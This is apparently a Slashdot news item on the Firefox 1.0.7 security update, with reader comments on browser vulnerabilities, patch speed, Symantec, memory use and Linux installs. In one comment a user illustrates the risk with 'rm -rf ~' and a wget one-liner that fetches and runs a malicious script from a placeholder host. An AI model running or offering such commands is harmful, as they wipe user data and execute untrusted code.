Firefox 1.0.7 Released

hackajar writes "Firefox 1.0.7 has been released today. From the announcement "Fixes are included for the international domain name (IDN) link buffer overflow vulnerability and the Linux command line URL parsing flaw. There are also other security and stability changes, including a fix for a crash experienced when using certain Proxy Auto-Config scripts. In addition, some regressions introduced by previous 1.0.x security updates have been resolved.""

Quick to the point

[timeToy]

That's perfectly fits with yesterday's news about Mozilla foundation being more reactive to security fixes than M$.

Re:Quick to the point

[shmlco]

I believe the actual story was about how Firefox was less secure. The spin on the story was that they're more reactive.

BTW, the use of "spin" was deliberate. I've yet to see numbers for both sides that prove MF is more reactive than MS, even though it appears to be "common knowledge". IIRC, the last release (1.0.6) fixed bugs found in March.

Re:Quick to the point

It doesn't address why their vulnerabilities are slowly getting more and more critical as time progresses, and more-numerous. The latest Firefox one from Secunia is marked "Extremely Critical" and affects... Unix/Linux systems only apparently. Kinda' an OSS double-whammy.

For all the huffing and puffing people do about Moz browsers... they sure don't seem to be getting any "safer" despite all the claims of how it being open source means more eyes are looking for holes, etc, etc... Nor does it explain why the vulnerabilities are there in the first place if open source truly is supposed to be a "superior way" of doing things.

Moz used to chastise MS for having any vulnerabilities in IE to begin with, and for their frequent patching. Now that Moz products have many vulnerabilities being discovered, Moz is patching them constantly and they've changed their tune to "but we patch them quickly!", conveniently ignoring the fact that they're on the same road as MS and IE, and that this same attitude was one they railed against MS for so long citing that it proved an "inferior way" of doing things.

Making a browser ain't so easy after all, is it guys?

No translated version

[zdzichu]

And yet again, users of localised build were left in the cold.
Think about your grandpa, who doesn't know english. He can't use non-translated build and is left with vulnerable, older version.
Good work, Firefox developers!

Re:No translated version

[Zerbey]

My (dearly departed) Grandad would have taken one look at Firefox, scoffed at the idea of even using a computer, let alone using one, and gone back to his gardening (which is was really good at). This is why I miss him so much.

Nasty bugs.

[LurkerXXX]

The unix/linux bad-link problem allowing malicious URLs to run shell scripts is a bit nasty. Maybe Symantec wasn't entirely blowing smoke the other day with their warnings about Firefox not really being that much more secure than IE. The patches come out faster, but there sure are some nasty bugs in there yet.

Re:Nasty bugs.

[LurkerXXX]

No, but that doesn't matter a bit.

Anyone can reinstall an OS in an hour. What matters is people's DATA. You know, pictures, documents, etc, accumulated over years. Stuff all users should back up but most users don't. Those are all things that can be trashed when an exploit hits them even when they aren't running as root.

The OS being intact is real nice for your geek pride, but but all the data files being trashed is a real loss to normal people.

Re:Nasty bugs.

[Zathrus]

Are you running Firefox as root?!?!

`rm -rf ~`

Because, of course, you wouldn't have anything valuable stored in your home directory, would you?

Not to mention that root privledges are not required to do a lot of things... like, oh say:


wget ftp://somesite/malicious_script && chmod +x malicious_script && ./malicious_script


What does malicious script do? Anything it wants -- including downloading and running root kits (after figuring out exactly which ones you are vulnerable to), sending out massive spam attacks, installing a user-level trojan that allows for remote controlled DDoS, etc.

I'm really tired of people claiming that not running as root is a miracle cure. Yes, it prevents some really nasty trivial attacks, but it doesn't protect your most valuable data (e.g. -- yours) and it doesn't prevent a lot of attacks that are perfectly happy to run in non-privledged space.

Re:Nasty bugs.

[miffo.swe]

The problem isnt in Firefox itself but rather in the script used to launch firefox from other applications. It demands launching a command from another application under your control going through bash. You cant be subjected to this by browsing around on the net for example. It demands user intervention to function. While i admit its a flaw its in no way as critical as some purports it to be. A similar flaw in Internet Explorer gets a minor threat rating.

There really needs to be some standard for rating security holes.

I mean, if this is rated very critical what the heck do you call a remote exploit? Very,very,very critical or what? Secunia, rated 7/5?

There seems to be a FUD campaign against Firefox. Why the heck would Symantec care about Firefox when they havent once to my knowledge critiziced Internet Explorer even when it had a critical patch coming out pretty much every day.

Re:Nasty bugs.

[14erCleaner]

There seems to be a FUD campaign against Firefox. Why the heck would Symantec care about Firefox when they havent once to my knowledge critiziced Internet Explorer even when it had a critical patch coming out pretty much every day.

Symantec sells security software that covers up Microsoft vulnerabilities.

If everybody stopped using IE and Outlook, half of their business might go away.

Colour me confused...

[bad_outlook]

Ok, I'm a geek and all, but this week I just installed 1.5 Beta 1 - so is it now vuln to this, whereas 1.0.7 is not? I understand branches, tags and such, but after awhile this could really confuse joe_user. Is anyone trying out the new Opera since it's now free? I've only tried the Win version, but darnit, it's very nice. Tonight I'll try it on Unbuntu, after updating FF to 1.0.7 of course (I don't run dev software at home, else I"ll hear about it crashing from my wife! ;))

Re:Colour me confused...

[Winckle]

I very much doubt Joe Sixpack would be using a beta build of firefox

Re:blah blah bugs blah blah security

[cerelib]

Not to take either side on this I have to disagree with your the relavance of your argument. The web has changed drastically since IE was first made.

One Fast Download!

[SmartyFartBlast]

wow, amazing what speeds I saw on that, over 1mbit which is pretty nice. Sure its not a super large file, but nice to see good speed when the server hasnt been /.'d

Now I wonder if my extensions will crash or act buggy...ah, well....the price was right ;-)

something concerns me

[Dink+Paisy]

"In addition, some regressions introduced by previous 1.0.x security updates have been resolved."

Too many regressions caused by security updates, and people will turn off auto-update. That's the very reason that Microsoft moved to a monthly update cycle. Getting updates out quickly is important, but unless the security hole is being actively exploited, it's probably more important to make sure nothing else gets broken by the fix. If you convince people not to install updates, then you're in really big trouble.

Re:something concerns me

[amdotaku]

Indeed, this is the dark side to Firefox, its stand alone update cycle. Its not friendly to extension developers, confuses and annoys users and administrators, and worse of all makes the whole Distribution based system the rest of FOSS uses go to pot.(Some people just want to run a version that comes with the distro without constant worrying and compatibility issues.) I think Firefox's special position at the head of the FOSS movement has made them focused too much on runing their own tight ship and not enough about letting their users do the same.

Great!

[setzman]

Now will it stop using anywheres from 73,788 K to 253,000 K RAM? I thought Firefox was supposed to be small and efficient, but that's the ram usage reported by Task Manager.

Re:Great!

[ergo98]

I got this all the time too - apparently this isn't a Firefox problem but instead a memory leak in the Flash plugin.

I read the blog and it doesn't seem convincing - there is a bit of a comment about Flash being the culprit, but then he/she segues to limiting the use of memory for caching.

Of course countless expanding memory caches have been misidentified as "leaks" over the years - SQL Server, for instance, will gobble up all available memory to use as a data cache, but it does it slowly as it pulls in data (just like Firefox does as you browses the web), utilizing memory as a much faster way of accessing data. As such there have been endless claims of SQL Server's "memory leak", and how people "solved" it by setting the governor limiting how much memory SQL Server will consume (all so they can sit and admire the high amount of unutilized available memory on their boxen). It should be noted that SQL Server relinquishes memory as other applications start asking for it (dunno if Firefox does the same).

I suspect the Firefox "fix" is much the same.

The M$ Take

[IorDMUX]

Ah. Mozilla has lept upon more discovered holes and promptly fixed them.

And somehow, these fixes make the browser all the less secure in the eyes of the big guys.

Re:Unless?

In other words, is it worth to replace a critical bug (security) with a minor bug (annoyance)?
 
If you value security over convenience, yes. Unfortunately, most people don't.

Re:Don't use your distro tools to install it...

[passthecrackpipe]

Heh, a list of many complex actions involving different user ID's, directories and other computer "magic" as seen from a users perspective, followed by:

"The install was as easy as anything packaged by Vise or InstallShield"

Can you please pass some of that crack you seem to be smoking? I'm a big linux fan, but installing anything, not in the least a user install from firefox, does not compare with the "double click setup.exe" from vise or installshield.

And before all the fanboys knee-jerk with the security/spyware/virus/whatever-my-linux-kung-fu-i s-so-cool-i-kick-your-ass stuff - I know, i use linux and firefox. but that still doesn't make it an easy install. The distro install, incidentally, is pretty easy though, so just wait for the vendor updates mmmkay?

Mod parent +25.

[khasim]

It seems that certain organizations are trying to hype every vulnerability that can be associated with FireFox. From my point of view they'd be ranked like this:

#1. Remote root access that does NOT require human intervention or other app running.

#2. Remote non-root access that does NOT require human intervention or other app running.

#3. Local root access that does NOT require human intervention or other app running.

#4. Local non-root access that does NOT require human intervention or other app running.

#5. Local root access that requires some human interaction or some combination of apps.

#6. Local non-root access that requires some human interaction or some combination of apps (this is where this exploit is)

#7. Remote OS crash

#8. Remote app crash

#9. Local OS crash

#10. Local app crash

This is MY opinion. Get your own opinion. There is no way this exploit is "critical". It's one step above a stupid DoS attack and would NOT affect ANY of my servers.

Re:Don't use your distro tools to install it...

[shaitand]

This is a pretty serious troll. There is no install on windows, install shield or otherwise that you can install with a double click. The double-click starts the installer, then you answer a series of questions. Afterward, you configure the app manually.

On linux you apt-get install app or select it and then click install in synaptic. Then configure the app manually. For many things you can simply run appname-configure afterward to configure.

In case you haven't noticed, the processes are mostly the same, except that linux does not require you to answer the string of questions.